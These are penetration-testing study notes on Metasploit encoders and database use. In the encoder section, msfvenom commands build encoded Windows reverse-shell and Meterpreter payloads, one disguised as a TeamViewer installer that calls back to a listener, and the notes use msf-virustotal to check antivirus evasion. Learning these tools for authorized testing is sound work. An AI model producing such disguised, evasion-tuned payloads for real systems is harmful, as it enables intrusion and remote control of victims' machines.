4 - MSF Encoders & DBs

# Encoders - Encoders assist with making payloads compatible with different processor architectures while at the same time helping with AV evasion - located in `/usr/share/metasploit-framework/modules/encoders` ![[images/Pasted image 20251004145609.png]] - encoders support different processor architectures: x65, x86, sparc, ppc, mips - `msfvenom` can be used for payload generation and encoding ```bash #generating a payload w/o encoding msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl ``` ```bash #generating a payload with encoding msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -o ./TeamViewerInstall.exe #specify output file name ``` - an encoder can also be selected from within `msfconsole` ```bash msf6 > search xxx msf6 > use xxx #select exploit module msf6 > show payloads #show payloads for selected exploit module msf6 > set payload X msf6 > show encoders #show encoders for selected exploit module msf6 > set encoder Y ``` ## MSF-Virustotal - Metasploit tool that we can use with an API key to analyze our payloads wrt to AV evasion - This requires free registration on VirusTotal ```bash msf-virustotal -k <API key> -f TeamViewerInstall.exe #analyze payload for AV evasion with VirusTotal ``` # Databases - Databases are used to keep track of results in MSF - `msfconsole` has built-in support for PostgreSQL dbs - Provides direct, quick, and easy access to scan results with the added ability to import and export results in conjunction with third-party tools - DB entries can also be used to directly configure exploit module params with the already existing findings ## MSF DB Setup ```bash sudo apt update && sudo apt install metasploit-framework #reinstalls MSF sudo service postgresql status #shows status of db sudo systemctl start postgresql #starts db sudo msfdb init #initiate the MSF db sudo msfdb status #shows status of MSF db sudo msfdb run #start msfconsole and connect to MSF db ``` - reinitiate the msf db if we run into errors such as mismatching creds ```bash msfdb reinit cp /usr/share/metasploit-framework/config/database.yml ~/.msf4/ sudo service postgresql restart msfconsole -q ``` ## Using the MSF DB - `msfconsole` includes integrated support for msfdb - databases can be exported and imported - workspaces acts like folders for a project ```bash msf6 > help database #shows msfconsole commands for msfdb msf6 > workspace #shows current workspace with an * msf6 > workspace -h #shows help menu for workspaces msf6 > workspace -a test1 #creates test1 workspace msf6 > workspace test1 #selects test1 workspace msf6 > db_import Target.xml #imports an nmap xml file msf6 > hosts #shows hosts based on imported nmap results (db table) msf6 > services #shows services based on imported nmap results (db table) msf6 > db_nmap -sV -sC <target_ip> #uses nmap from msfconsole msf6 > hosts #shows hosts based on nmap results msf6 > services #shows services based on nmap results msf6 > db_export -h #shows help menu for db exports msf6 > hosts -h #shows help menu for hosts msf6 > services -h #shows help menu for services msf6 > creds -h #shows help menu for credentials gathered msf6 > loot -h #shows help menu for loot gathered ```